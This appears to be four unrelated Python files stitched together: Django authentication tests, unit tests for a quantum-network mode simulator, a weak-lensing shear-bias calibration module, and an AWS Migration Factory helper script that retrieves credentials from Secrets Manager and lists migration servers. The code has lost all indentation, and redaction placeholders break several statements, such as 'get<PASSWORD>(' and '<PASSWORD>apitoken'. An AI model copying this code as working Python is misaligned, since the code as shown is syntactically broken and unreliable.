self.user = ScfUser.objects.create_user(self.email, self.password)
def test_authentication_without_password(self):
""" authentication without password"""
response = self.client.post(self.url, {"email": "<EMAIL>"})
self.assertEqual(400, response.status_code)
def test_authentication_with_wrong_password(self):
""" authentication without wrong password"""
response = self.client.post(self.url, {"email": self.email, "password": "<PASSWORD>"})
self.assertEqual(401, response.status_code)
def test_authentication_with_valid_data(self):
""" authentication without valid data"""
response = self.client.post(self.url, {"email": self.email, "password": self.password})
self.assertEqual(200, response.status_code)
self.assertTrue("token" in response.data)
class UserLogoutAPIViewTestCase(APITestCase):
""" user logout api test cases """
url = reverse("hav-logout")
def setUp(self):
""" initialized setup data"""
self.username = "logout_test"
self.email = "<EMAIL>"
self.password = "<PASSWORD>"
self.user = ScfUser.objects.create_user(self.email, self.password)
self.token = Token.objects.get_or_create(user=self.user)
self.api_authentication()
def api_authentication(self):
""" get client session"""
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token[0].key)
def test_logout(self):
""" test user logout"""
response = self.client.get(self.url)
self.assertEqual(200, response.status_code)
self.assertFalse(Token.objects.filter(key=self.token[0].key).exists())
|
<reponame>Phionx/quantumnetworks
"""
Unittests
Run using:
python -m unittest tests/test_multimode.py
"""
import os
import sys
import unittest
sys.path.insert(0, ".." + os.sep)
from quantumnetworks import SingleModeSystem, DoubleModeSystem, MultiModeSystem
from scipy.integrate import odeint
import numpy as np
class MultiModeTest(unittest.TestCase):
def test_forward_euler_default_A_in(self):
"""
Compare forward euler evolution of a coupled two mode system
with default (no) drive against scipy's odeint solver.
"""
omegas = [2 * np.pi * 1, 2 * np.pi * 2]
kappas = [2 * np.pi * 0.001, 2 * np.pi * 0.005]
couplings = [[0, 1, 2 * np.pi * 0.002]]
gammas = [2 * np.pi * 0.002, 2 * np.pi * 0.002]
kerrs = [2 * np.pi * 0.01, 2 * np.pi * 0.01]
system = MultiModeSystem(
params={
"omegas": omegas,
"kappas": kappas,
"gammas": gammas,
"kerrs": kerrs,
"couplings": couplings,
}
)
x_0 = np.array([1, 0, 0, 1])
ts = np.linspace(0, 1, 100001)
X = system.forward_euler(x_0, ts)
# solve using scipy.integrate.odeint
func = lambda y, t: system.eval_f(y, system.eval_u(t))
sol = odeint(func, x_0, ts)
self.assertTrue(np.allclose(X.T, sol, atol=0.002))
def test_trapezoidal_default_A_in(self):
"""
Compare trapezoidal evolution of a coupled two mode system
with default (no) drive against scipy's odeint solver.
"""
omegas = [2 * np.pi * 1, 2 * np.pi * 2]
kappas = [2 * np.pi * 0.001, 2 * np.pi * 0.005]
couplings = [[0, 1, 2 * np.pi * 0.002]]
gammas = [2 * np.pi * 0.002, 2 * np.pi * 0.002]
kerrs = [2 * np.pi * 0.01, 2 * np.pi * 0.01]
system = MultiModeSystem(
params={
"omegas": omegas,
"kappas": kappas,
"gammas": gammas,
"kerrs": kerrs,
"couplings": couplings,
}
)
x_0 = np.array([1, 0, 0, 1])
ts = np.linspace(0, 1, 1001)
X = system.trapezoidal(x_0, ts)
# solve using scipy.integrate.odeint
func = lambda y, t: system.eval_f(y, system.eval_u(t))
sol = odeint(func, x_0, ts)
self.assertTrue(np.allclose(X.T, sol, atol=0.0005))
def test_trapezoidal_dynamic_default_A_in(self):
"""
Compare dynamic dt trapezoidal evolution of a coupled two mode system
with default (no) drive against scipy's odeint solver.
"""
omegas = [2 * np.pi * 1, 2 * np.pi * 2]
kappas = [2 * np.pi * 0.001, 2 * np.pi * 0.005]
couplings = [[0, 1, 2 * np.pi * 0.002]]
gammas = [2 * np.pi * 0.002, 2 * np.pi * 0.002]
kerrs = [2 * np.pi * 0.01, 2 * np.pi * 0.01]
system = MultiModeSystem(
params={
"omegas": omegas,
"kappas": kappas,
"gammas": gammas,
"kerrs": kerrs,
"couplings": couplings,
}
)
x_0 = np.array([1, 0, 0, 1])
ts = np.linspace(0, 1, 1001)
X, ts = system.trapezoidal(x_0, ts, dynamic_dt=True)
# solve using scipy.integrate.odeint
func = lambda y, t: system.eval_f(y, system.eval_u(t))
sol = odeint(func, x_0, ts)
self.assertTrue(np.allclose(X.T, sol, atol=0.005))
def test_analytic_vs_numerical_Jf(self):
"""
Compare analytic vs numerical Jacobian.
"""
omegas = [2 * np.pi * 1, 2 * np.pi * 2]
kappas = [2 * np.pi * 0.001, 2 * np.pi * 0.005]
gammas = [2 * np.pi * 0.002, 2 * np.pi * 0.002]
kerrs = [2 * np.pi * 0.01, 2 * np.pi * 0.01]
couplings = [[0, 1, 2 * np.pi * 0.002]]
system = MultiModeSystem(
params={
"omegas": omegas,
"kappas": kappas,
"gammas": gammas,
"kerrs": kerrs,
"couplings": couplings,
}
)
x_0 = np.array([1, 0, 0, 1])
u = system.eval_u(0)
Jf_analytic = system.eval_Jf(x_0, u)
Jf_numeric = system.eval_Jf_numerical(x_0, u)
self.assertTrue(np.allclose(Jf_analytic, Jf_numeric))
def test_against_double_mode(self):
"""
Compare forward euler evolution of a coupled two mode system
against double mode code.
"""
omegas = [2 * np.pi * 1, 2 * np.pi * 2]
kappas = [2 * np.pi * 0.001, 2 * np.pi * 0.005]
gammas = [2 * np.pi * 0.002, 2 * np.pi * 0.002]
kerrs = [2 * np.pi * 0.01, 2 * np.pi * 0.01]
couplings = [[0, 1, 2 * np.pi * 0.002]]
system = MultiModeSystem(
params={
"omegas": omegas,
"kappas": kappas,
"gammas": gammas,
"kerrs": kerrs,
"couplings": couplings,
}
)
A_in = lambda t: 0
B_in = lambda t: 0
system_double = DoubleModeSystem(
params={
"omega_a": 2 * np.pi * 1,
"omega_b": 2 * np.pi * 2,
"kappa_a": 2 * np.pi * 0.001,
"kappa_b": 2 * np.pi * 0.005,
"kerr_a": 2 * np.pi * 0.01,
"kerr_b": 2 * np.pi * 0.01,
"gamma_a": 2 * np.pi * 0.002,
"gamma_b": 2 * np.pi * 0.002,
"g_ab": 2 * np.pi * 0.002,
},
A_in=A_in,
B_in=B_in,
)
self.assertTrue(np.array_equal(system.A, system_double.A))
self.assertTrue(np.array_equal(system.B, system_double.B))
def test_against_single_mode(self):
"""
Compare forward euler evolution of a single mode system
against single mode code.
"""
omegas = [2 * np.pi * 1]
kappas = [2 * np.pi * 0.001]
gammas = [2 * np.pi * 0.002]
kerrs = [2 * np.pi * 0.01]
couplings = []
system = MultiModeSystem(
params={
"omegas": omegas,
"kappas": kappas,
"gammas": gammas,
"kerrs": kerrs,
"couplings": couplings,
}
)
A_in = lambda t: 0
system_double = SingleModeSystem(
params={
"omega_a": 2 * np.pi * 1,
"kappa_a": 2 * np.pi * 0.001,
"gamma_a": 2 * np.pi * 0.002,
"kerr_a": 2 * np.pi * 0.01,
},
A_in=A_in,
)
self.assertTrue(np.array_equal(system.A, system_double.A))
self.assertTrue(np.array_equal(system.B, system_double.B))
def test_linearization(self):
"""
Compare forward euler evolution of linearized system dynamics of a coupled three mode system,
against full nonlinear dynamics (at early times).
"""
omegas = [2 * np.pi * 1, 2 * np.pi * 2, 2 * np.pi * 1]
kappas = [2 * np.pi * 0.001, 2 * np.pi * 0.005, 2 * np.pi * 0.001]
gammas = [2 * np.pi * 0.002, 2 * np.pi * 0.002, 2 * np.pi * 0.002]
kerrs = [2 * np.pi * 0.001, 2 * np.pi * 0.001, 2 * np.pi * 0.001]
couplings = [[0, 1, 2 * np.pi * 0.002], [1, 2, 2 * np.pi * 0.002]]
sys = MultiModeSystem(
params={
"omegas": omegas,
"kappas": kappas,
"gammas": gammas,
"kerrs": kerrs,
"couplings": couplings,
}
)
x_0 = np.array([1, 0, 0, 1, 1, 0])
n = 100000
ts = np.linspace(0, 1, n + 1)
X = sys.forward_euler(x_0, ts)
X_linear = sys.forward_euler_linear(x_0, ts, x_0, 0)
# take beginning of sequences
X_linear_i = X_linear[:, : n // 10]
X_i = X[:, : n // 10]
# filter to prevent divide by 0 errors
X_linear_i = X_linear_i[X_i != 0]
X_i = X_i[X_i != 0]
max_perc_diff = np.max(np.abs((X_i - X_linear_i) / X_i))
self.assertTrue(max_perc_diff < 0.01) # within 1%
#%%
if __name__ == "__main__":
unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 24 13:24:43 2020
@author: ssli
Module to calculate the m bias
mcFitFunc:
Shear bias function.
WgQuantile1DFunc:
Calculate the weighted quantile by given probabilities
designed for 1D numpy array.
WgBin2DFunc:
Calculate the weighted quantile by given bin numbers
designed for 2D numpy array
mCalFunc:
Calculating the residual shear bias (m-value) in 2-d bins
"""
import numpy as np
from scipy import optimize
import pandas as pd
from astropy.io import fits
## All possible g1,g2 combinations
g1Range = np.array([-0.04,0.00,0.04,0.00,-0.0283,+0.0283,+0.0283,-0.0283])
g2Range = np.array([0.00,0.04,0.00,-0.04,+0.0283,+0.0283,-0.0283,-0.0283])
def mcFitFunc(x, m, c):
"""
Shear bias function.
"""
return (1.+m)*x+c
def WgQuantile1DFunc(values, weights, pq):
"""
Calculate the weighted quantile by given probabilities
designed for 1D numpy array.
"""
# Sort the data
ind_sorted = np.argsort(values)
v_sorted = values[ind_sorted]
wg_sorted = weights[ind_sorted]
# Compute the auxiliary arrays
Sn = np.cumsum(wg_sorted)
Pn = (Sn-0.5*wg_sorted)/np.sum(wg_sorted)
# Get the quantiles
res = np.interp(pq, Pn, v_sorted)
return res
def WgBin2DFunc(v1, v2, wgs, Nbin1, Nbin2):
"""
Calculate the weighted quantile by given bin numbers
designed for 2D numpy array
"""
# Define the probabilities for the quantiles based on the number of bins
pq1 = np.linspace(0,1.0,Nbin1+1)
pq2 = np.linspace(0,1.0,Nbin2+1)
# Calculate quantiles for v1
q1 = WgQuantile1DFunc(v1, wgs, pq1)
#Compute quantiles for v2 in each v1 bin
q2s=[]
for i in range(len(q1)-1):
mask = (v1>=q1[i])&(v1<q1[i+1])
q2 = WgQuantile1DFunc(v2[mask], wgs[mask], pq2)
q2s.append(q2)
return q1, np.array(q2s)
def mCalFunc(id_bin, dataSim, dataReal,
Nbin1, Nbin2, pq):
"""
Calculating the residual shear bias in 2-d bins
"""
# helper quantities
# Simulation
snrSim = dataSim['snr_model'].values
#
g1_inSim = dataSim['g1'].values
g2_inSim = dataSim['g2'].values
#
e1Sim = dataSim['e1'].values
e2Sim = dataSim['e2'].values
eSim = np.sqrt(e1Sim**2 + e2Sim**2)
#
size_out_altSim = dataSim['size_out'].values*np.sqrt((1.-eSim)/(1.+eSim))
#
RSim = dataSim['psf_size_in'].values/(size_out_altSim**2+dataSim['psf_size_in'].values)
#
wgSim= dataSim['LFweight'].values
#
# Data
snrReal = dataReal['model_SNratio'].values
#Define PSF size
size_psfReal = np.sqrt(dataReal['PSF_Q11'].values*dataReal['PSF_Q22'].values - dataReal['PSF_Q12'].values**2)
#Define |e| for the 3 blindings
eReal = np.sqrt(dataReal['bias_corrected_e1'].values**2 + dataReal['bias_corrected_e2'].values**2)
#Define circularised galaxy size
size_abReal = dataReal['bias_corrected_scalelength_pixels'].values*np.sqrt((1.-eReal)/(1.+eReal))
#Define galaxy 'resolution'
RReal = size_psfReal/(size_abReal**2+size_psfReal)
# weight
wgReal = dataReal['recal_weight'].values
# 2D binning
#Calculate the bins such that each bin contains the same number of points.
bin1_bounds, bin2_bounds = WgBin2DFunc(snrSim, RSim, wgSim, Nbin1, Nbin2)
wgRealSums = []
wgReal2Sums = []
m1s = []
m2s = []
m1_errs = []
m2_errs = []
m1_err_BSs = []
m2_err_BSs = []
m_err_BSs = []
for i in range(Nbin1):
lower1 = bin1_bounds[i]
upper1 = bin1_bounds[i+1]
#
mask1Sim = (snrSim>=lower1)&(snrSim<upper1)
mask1Real = (snrReal>=lower1)&(snrReal<upper1)
for j in range(Nbin2):
lower2 = bin2_bounds[i][j]
upper2 = bin2_bounds[i][j+1]
#
mask2Sim = (RSim>=lower2)&(RSim<upper2)
mask2Real = (RReal>=lower2)&(RReal<upper2)
#
maskSim = mask1Sim & mask2Sim
maskReal = mask1Real & mask2Real
# mask input parameters
# Simulation
wgSim_mask = wgSim[maskSim]
#
e1Sim_mask = e1Sim[maskSim]
e2Sim_mask = e2Sim[maskSim]
#
g1_inSim_mask = g1_inSim[maskSim]
g2_inSim_mask = g2_inSim[maskSim]
# data
wgReal_mask = wgReal[maskReal]
wgRealSums.append(np.sum(wgReal_mask))
# prepare shear parameters for mc fitting
g1_out=[]
g2_out=[]
g_out_w=[]
g1_in_used=[]
g2_in_used=[]
for kk in range(len(g1Range)):
maskShear=(g1_inSim_mask==g1Range[kk])&(g2_inSim_mask==g2Range[kk])
numMasked=len(e1Sim_mask[maskShear])
if (numMasked >0):
#Calculating bin average for calibration quantities
g1_out.append(np.average(e1Sim_mask[maskShear], weights=wgSim_mask[maskShear]))
g2_out.append(np.average(e2Sim_mask[maskShear], weights=wgSim_mask[maskShear]))
g_out_w.append(1./(np.sum(wgSim_mask[maskShear]))**0.5)
#
g1_in_used.append(g1Range[kk])
g2_in_used.append(g2Range[kk])
# Start mc fitting
numShear=len(g1_out)
if(numShear<3):
print('Cannot do the regression in bin ', \
bin1_bounds[i], bin1_bounds[i+1], bin2_bounds[i][j], bin2_bounds[i][j+1], \
' less than 3 shear values! (', numShear, ')')
exit()
else:
g1_in_used = np.array(g1_in_used)
g2_in_used = np.array(g2_in_used)
g1_out = np.array(g1_out)
g2_out = np.array(g2_out)
g_out_w = np.array(g_out_w)
m1c1, err1 = optimize.curve_fit(mcFitFunc, xdata=g1_in_used, ydata=g1_out, sigma=g_out_w)
m2c2, err2 = optimize.curve_fit(mcFitFunc, xdata=g2_in_used, ydata=g2_out, sigma=g_out_w)
m1 = m1c1[0]
m1_err = (err1[0,0])**0.5
# # #
# c1 = m1c1[1]
# c1_err = (err1[1,1])**0.5
#
m2 = m2c2[0]
m2_err = (err2[0,0])**0.5
# # #
# c2 = m2c2[1]
# c2_err =(err2[1,1])**0.5
#
#
# m = (m1 + m2)/2.
# Performing Bootstrap
nboot = 50
m1_sample = np.zeros(nboot)
m2_sample = np.zeros(nboot)
m_sample = np.zeros(nboot)
# c1_sample = np.zeros(nboot)
# c2_sample = np.zeros(nboot)
for BS_index in range(nboot):
# Retrieving random shears
index = np.random.randint(0,numShear,numShear)
BS_g1_in = g1_in_used[index]
BS_g2_in = g2_in_used[index]
BS_g1_out = g1_out[index]
BS_g2_out = g2_out[index]
BS_g_out_w = g_out_w[index]
m1c1, err1 = optimize.curve_fit(mcFitFunc, xdata=BS_g1_in, ydata=BS_g1_out, sigma=BS_g_out_w)
m2c2, err2 = optimize.curve_fit(mcFitFunc, xdata=BS_g2_in, ydata=BS_g2_out, sigma=BS_g_out_w)
m1_sample[BS_index] = m1c1[0]
m2_sample[BS_index] = m2c2[0]
m_sample[BS_index] = (m1c1[0]+m2c2[0])/2.
# c1_sample[BS_index] = m1c1[1]
# c2_sample[BS_index] = m2c2[1]
m1_err_BS = np.std(m1_sample)
m2_err_BS = np.std(m2_sample)
m_err_BS = np.std(m_sample)
# c1_err_BS = np.std(c1_sample)
# c2_err_BS = np.std(c2_sample)
#
m1s.append(m1)
m2s.append(m2)
m1_errs.append(m1_err)
m2_errs.append(m2_err)
m1_err_BSs.append(m1_err_BS)
m2_err_BSs.append(m2_err_BS)
m_err_BSs.append(m_err_BS)
wgRealSums = np.array(wgRealSums)
m1s = np.array(m1s)
m2s = np.array(m2s)
m1_errs = np.array(m1_errs)
m2_errs = np.array(m2_errs)
m1_err_BSs = np.array(m1_err_BSs)
m2_err_BSs = np.array(m2_err_BSs)
m_err_BSs = np.array(m_err_BSs)
m1_final = np.average(m1s, weights=wgRealSums)
m2_final = np.average(m2s, weights=wgRealSums)
m_final = (m1_final+m2_final)/2.
m1_err_final = np.sqrt(np.sum((wgRealSums*m1_errs)**2.))/np.sum(wgRealSums)
m2_err_final = np.sqrt(np.sum((wgRealSums*m2_errs)**2.))/np.sum(wgRealSums)
m1_err_BS_final = np.sqrt(np.sum((wgRealSums*m1_err_BSs)**2.))/np.sum(wgRealSums)
m2_err_BS_final = np.sqrt(np.sum((wgRealSums*m2_err_BSs)**2.))/np.sum(wgRealSums)
m_err_BS_final = np.sqrt(np.sum((wgRealSums*m_err_BSs)**2.))/np.sum(wgRealSums)
#
res = {"id_bin": id_bin, "m_final": m_final, 'm_err_BS_final': m_err_BS_final, \
'm1_final': m1_final, 'm2_final': m2_final, \
'm1_err_final': m1_err_final, 'm2_err_final': m2_err_final, \
'm1_err_BS_final': m1_err_BS_final, 'm2_err_BS_final': m2_err_BS_final}
pq.put(res)
|
#########################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# SPDX-License-Identifier: MIT-0 #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy of this #
# software and associated documentation files (the "Software"), to deal in the Software #
# without restriction, including without limitation the rights to use, copy, modify, #
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to #
# permit persons to whom the Software is furnished to do so. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, #
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A #
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT #
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION #
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE #
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
#########################################################################################
# Version: 17MAY2021.01
import sys
import argparse
import requests
import json
import getpass
import boto3
import botocore
import calendar
import time
import base64
ts = calendar.timegm(time.gmtime())
region = ""
Domain_User= ''
Domain_Password = ''
# boto session for secretsmanager
try:
boto_session = boto3.session.Session()
from botocore.exceptions import ClientError
except:
region = ""
if region == None:
region = ""
# Constants referenced from other modules.
ce_endpoint = '/api/latest/{}'
ce_address = 'https://console.cloudendure.com'
ce_headers = {'Content-Type': 'application/json'}
serverendpoint = '/prod/user/servers'
appendpoint = '/prod/user/apps'
waveendpoint = '/prod/user/waves'
with open('FactoryEndpoints.json') as json_file:
mf_config = json.load(json_file)
# common functions
def GetWindowsPassword(domainuser):
Domain_User_temp, Domain_Password_temp, token = get_details_from_secret_manager("MGN_WINDOWS_CREDENTIAL")
if domainuser != "" and Domain_User_temp != domainuser:
Domain_User = domainuser
print("Windows credentials for Migration Factory missing. Please setup the Secrets in Secret Manager!!!")
pass_first = getpass.getpass("Windows User Password: ")
pass_second = getpass.getpass("Re-enter Password: ")
while(pass_first != pass_second):
print("Password mismatch, please try again!")
pass_first = getpass.getpass("Windows User Password: ")
pass_second = getpass.getpass("Re-enter Password: ")
Domain_Password = pass_second
elif domainuser != "" and Domain_User_temp == domainuser and Domain_Password_temp != "" :
Domain_User = domainuser
Domain_Password = Domain_Password_temp
elif not domainuser and Domain_User_temp != "" and Domain_Password_temp != "":
Domain_User = Domain_User_temp
Domain_Password = Domain_Password_temp
elif not domainuser and not Domain_User_temp:
Domain_User = input("Enter Windows Username: ")
pass_first = getpass.getpass("Windows User Password: ")
pass_second = getpass.getpass("Re-enter Password: ")
while(pass_first != pass_second):
print("Password mismatch, please try again!")
pass_first = getpass.getpass("Windows User Password: ")
pass_second = getpass.getpass("Re-enter Password: ")
Domain_Password = <PASSWORD>
return Domain_User, Domain_Password
def get_linux_password():
user_name = ''
pass_key = ''
has_key = ''
key_exist = False
if not user_name or user_name == '':
print("****************************************************")
print("* Fetching Linux login details from secret manager *")
print("****************************************************")
user_name_temp, password, token = get_details_from_secret_manager("MGN_LINUX_CREDENTIAL")
user_name1, pem_key, token = get_details_from_secret_manager("PE")
if not user_name1 and not user_name_temp:
print("Linux credentials for Migration Factory missing. Please setup the Secrets in Secret Manager!!!")
user_name = input("Enter Linux Username: ")
has_key = input("If you use a private key to login, press [Y] or if use password press [N]: ")
if has_key.lower() in 'y':
pass_key = input('Private Key file name: ')
key_exist = True
else:
pass_key_first = getpass.getpass('Enter Linux Password : ')
pass_key_second = getpass.getpass('Re-enter Linux Password: ')
while pass_key_first != pass_key_second:
print("Password mismatch, please try again!")
pass_key_first = getpass.getpass('Enter Linux Password : ')
pass_key_second = getpass.getpass('Re-enter Linux Password: ')
pass_key = pass_key_second
elif not password and not pem_key:
print("Linux credentials for Migration Factory missing. Configure either password or private key in "
"Secrets Manager!!!")
sys.exit(1)
elif pem_key != "":
# If both PEM Key and Password is configured, PEM key would take the preference.
print("Login using Linux Private key")
user_name = user_name1
pass_key = pem_key
key_exist = True
else:
print("Login using Linux password")
user_name = user_name_temp
pass_key = password
return user_name, pass_key, key_exist
def Factorylogin():
username = ""
password = ""
using_secret = False
if 'UserPoolId' in mf_config and 'Region' in mf_config:
try:
secretsmanager_client = boto3.client('secretsmanager', mf_config['Region'])
# mf_service_account_details = secretsmanager_client.describe_secret(SecretId='MFServiceAccount-' + mf_config['UserPoolId'])
mf_service_account = secretsmanager_client.get_secret_value(SecretId='MFServiceAccount-' + mf_config['UserPoolId'])
#username = mf_service_account_details['Description']
mfauth = json.loads(mf_service_account['SecretString'])
username = mfauth['username']
password = mfauth['password']
using_secret = True
except botocore.exceptions.ClientError as e:
print(e)
if e.response['Error']['Code'] == 'ResourceNotFoundException' or e.response['Error']['Code'] == 'AccessDeniedException':
print("Service Account doesn't exist or access is denied to Secret, please enter username and password")
if 'DefaultUser' in mf_config:
DefaultUser = mf_config['DefaultUser']
else:
DefaultUser = ''
username = input("Factory Username [" + DefaultUser + "]: ") or DefaultUser
password = get<PASSWORD>('Factory Password: ')
else:
if 'DefaultUser' in mf_config:
DefaultUser = mf_config['DefaultUser']
else:
DefaultUser = ""
username = input("Factory Username [" + DefaultUser + "]: ") or DefaultUser
password = <PASSWORD>('Factory Password: ')
login_data = {'username': username, 'password': password}
try:
r = requests.post(mf_config['LoginApiUrl'] + '/prod/login',
data=json.dumps(login_data))
if r.status_code == 200:
print("Migration Factory : You have successfully logged in")
print("")
token = str(json.loads(r.text))
return token
if r.status_code == 502 or r.status_code == 400:
if using_secret:
print("ERROR: Incorrect username or password stored in Secrets Manager [MFServiceAccount-" + mf_config['UserPoolId'] + "] in region " + mf_config['Region'] + ".")
else:
print("ERROR: Incorrect username or password....")
sys.exit()
else:
print(r.text)
sys.exit()
except requests.ConnectionError as e:
raise SystemExit("ERROR: Connecting to the Login API failed, please check Login API in FactoryEndpoints.json file. "
"If the API endpoint is correct, please close cmd and open a new cmd to run the script again")
def ServerList(waveid, token, UserHOST, Projectname):
# Get all Apps and servers from migration factory
auth = {"Authorization": token}
servers = json.loads(requests.get(UserHOST + serverendpoint, headers=auth).text)
#print(servers)
apps = json.loads(requests.get(UserHOST + appendpoint, headers=auth).text)
#print(apps)
# Get App list
applist = []
for app in apps:
if 'wave_id' in app:
if str(app['wave_id']) == str(waveid):
if Projectname != "":
if str(app['cloudendure_projectname']) == str(Projectname):
applist.append(app['app_id'])
else:
applist.append(app['app_id'])
#print(apps)
#print(servers)
# Get Server List
servers_Windows = []
servers_Linux = []
for app in applist:
for server in servers:
if app == server['app_id']:
if 'server_os_family' in server:
if 'server_fqdn' in server:
if server['server_os_family'].lower() == "windows":
servers_Windows.append(server)
if server['server_os_family'].lower() == "linux":
servers_Linux.append(server)
else:
print("ERROR: server_fqdn for server: " + server['server_name'] + " doesn't exist")
sys.exit(4)
else:
print ('server_os_family attribute does not exist for server: ' + server['server_name'] + ", please update this attribute")
sys.exit(2)
if len(servers_Windows) == 0 and len(servers_Linux) == 0:
print("ERROR: Serverlist for wave: " + waveid + " in CE Project " + Projectname + " is empty....")
print("")
else:
print("successfully retrieved server list")
print("")
if len(servers_Windows) > 0:
print("*** Windows Server List")
for server in servers_Windows:
print(server['server_name'])
else:
print("*** No Windows Servers")
print("")
if len(servers_Linux) > 0:
print("*** Linux Server List ***")
print("")
for server in servers_Linux:
print(server['server_name'])
else:
print("*** No Linux Servers")
return servers_Windows, servers_Linux
def CElogin(userapitoken):
login_data = {'userApiToken': <PASSWORD>apitoken}
r = requests.post(ce_address + ce_endpoint.format('login'),
data=json.dumps(login_data), headers=ce_headers)
if r.status_code == 200:
print("CloudEndure : You have successfully logged in")
print("")
if r.status_code != 200 and r.status_code != 307:
if r.status_code == 401 or r.status_code == 403:
print('ERROR: The CloudEndure login credentials provided cannot be authenticated....')
return None, None
elif r.status_code == 402:
print('ERROR: There is no active license configured for this CloudEndure account....')
return None, None
elif r.status_code == 429:
print('ERROR: CloudEndure Authentication failure limit has been reached. The service will become available for additional requests after a timeout....')
return None, None
# check if need to use a different API entry point
if r.history:
endpointnew = '/' + '/'.join(r.url.split('/')[3:-1]) + '/{}'
r = requests.post(ce_address + endpointnew.format('login'),
data=json.dumps(login_data), headers=ce_headers)
try:
ce_headers['X-XSRF-TOKEN'] = r.cookies['XSRF-TOKEN']
return r.cookies['session'], ce_headers['X-XSRF-TOKEN']
except:
pass
return r.cookies['session'], None
def GetCERegion(project_id, ce_session, ce_headers):
region_ids = []
rep = requests.get(ce_address + ce_endpoint.format('projects/{}/replicationConfigurations').format(project_id), headers=ce_headers, cookies=ce_session)
for item in json.loads(rep.text)['items']:
region = requests.get(ce_address + ce_endpoint.format('cloudCredentials/{}/regions/{}').format(item['cloudCredentials'], item['region']), headers=ce_headers, cookies=ce_session)
name = json.loads(region.text)['name']
region_code = ""
if "Northern Virginia" in name:
region_code = 'us-east-1'
elif "Frankfurt" in name:
region_code = 'eu-central-1'
elif "Paris" in name:
region_code = 'eu-west-3'
elif "Stockholm" in name:
region_code = 'eu-north-1'
elif "Northern California" in name:
region_code = 'us-west-1'
elif "Oregon" in name:
region_code = 'us-west-2'
elif "AWS GovCloud (US)" in name:
region_code = 'us-gov-west-1'
elif "Bahrain" in name:
region_code = 'me-south-1'
elif "Hong Kong" in name:
region_code = 'ap-east-1'
elif "Tokyo" in name:
region_code = 'ap-northeast-1'
elif "Singapore" in name:
region_code = 'ap-southeast-1'
elif "AWS GovCloud (US-East)" in name:
region_code = 'us-gov-east-1'
elif "Mumbai" in name:
region_code = 'ap-south-1'
elif "South America" in name:
region_code = 'sa-east-1'
elif "Sydney" in name:
region_code = 'ap-southeast-2'
elif "London" in name:
region_code = 'eu-west-2'
elif "Central" in name:
region_code = 'ca-central-1'
elif "Ireland" in name:
region_code = 'eu-west-1'
elif "Seoul" in name:
region_code = 'ap-northeast-2'
elif "Ohio" in name:
region_code = 'us-east-2'
else:
print("Incorrect Region Name")
region_ids.append(region_code)
return region_ids
#Function is used with new MGN capabiltiy to get servers based on the AWS account they are targeted to.
def get_factory_servers(waveid, token, UserHOST, osSplit = True):
try:
linux_exist = False
windows_exist = False
auth = {"Authorization": token}
# Get all Apps and servers from migration factory
getservers = json.loads(requests.get(UserHOST + serverendpoint, headers=auth).text)
#print(servers)
getapps = json.loads(requests.get(UserHOST + appendpoint, headers=auth).text)
#print(apps)
servers = sorted(getservers, key = lambda i: i['server_name'])
apps = sorted(getapps, key = lambda i: i['app_name'])
# Get Unique target AWS account and region
aws_accounts = []
for app in apps:
if 'wave_id' in app and 'aws_accountid' in app and 'aws_region' in app:
if str(app['wave_id']) == str(waveid):
if len(str(app['aws_accountid']).strip()) == 12:
target_account = {}
target_account['aws_accountid'] = str(app['aws_accountid']).strip()
target_account['aws_region'] = app['aws_region'].lower().strip()
if osSplit:
target_account['servers_windows'] = []
target_account['servers_linux'] = []
else:
target_account['servers'] = []
if target_account not in aws_accounts:
aws_accounts.append(target_account)
else:
msg = "ERROR: Incorrect AWS Account Id Length for app: " + app['app_name']
print(msg)
sys.exit()
if len(aws_accounts) == 0:
msg = "ERROR: Server list for wave " + waveid + " is empty...."
print(msg)
sys.exit()
# Get server list
for account in aws_accounts:
print("### Servers in Target Account: " + account['aws_accountid'] + " , region: " + account['aws_region'] + " ###")
for app in apps:
if 'wave_id' in app and 'aws_accountid' in app and 'aws_region' in app:
if str(app['wave_id']) == str(waveid):
if str(app['aws_accountid']).strip() == str(account['aws_accountid']):
if app['aws_region'].lower().strip() == account['aws_region']:
for server in servers:
if 'app_id' in server:
if server['app_id'] == app['app_id']:
# verify server_os_family attribute, only accepts Windows or Linux
if 'server_os_family' in server:
# Verify server_fqdn, this is mandatory attribute
if 'server_fqdn' in server:
if osSplit:
if server['server_os_family'].lower() == 'windows':
account['servers_windows'].append(server)
elif server['server_os_family'].lower() == 'linux':
account['servers_linux'].append(server)
else:
print("ERROR: Invalid server_os_family for: " + server['server_name'] + ", please select either Windows or Linux")
sys.exit()
else:
account['servers'].append(server)
print(server['server_fqdn'])
else:
print("ERROR: server_fqdn for server: " + server['server_name'] + " doesn't exist")
sys.exit()
else:
print("ERROR: server_os_family does not exist for: " + server['server_name'])
sys.exit()
print("")
if osSplit:
# Check if the server list is empty for both Windows and Linux
if len(account['servers_windows']) == 0 and len(account['servers_linux']) == 0:
msg = "ERROR: Server list for wave " + waveid + " and account: " + account['aws_accountid'] + " region: " + account['aws_region'] + " is empty...."
print(msg)
sys.exit()
if len(account['servers_linux']) > 0:
linux_exist = True
if len(account['servers_windows']) > 0:
windows_exist = True
else:
if len(account['servers']) == 0:
msg = "ERROR: Server list for wave " + waveid + " and account: " + account['aws_accountid'] + " region: " + account['aws_region'] + " is empty...."
print(msg)
sys.exit()
if osSplit:
return aws_accounts, linux_exist, windows_exist
else:
return aws_accounts
except botocore.exceptions.ClientError as error:
if ":" in str(error):
err = ''
msgs = str(error).split(":")[1:]
for msg in msgs:
err = err + msg
msg = "ERROR: " + err
print(msg)
sys.exit()
else:
msg = "ERROR: " + str(error)
print(msg)
sys.exit()
def get_MGN_Source_Server(factoryserver, mgn_sourceservers):
lsourceserver = None
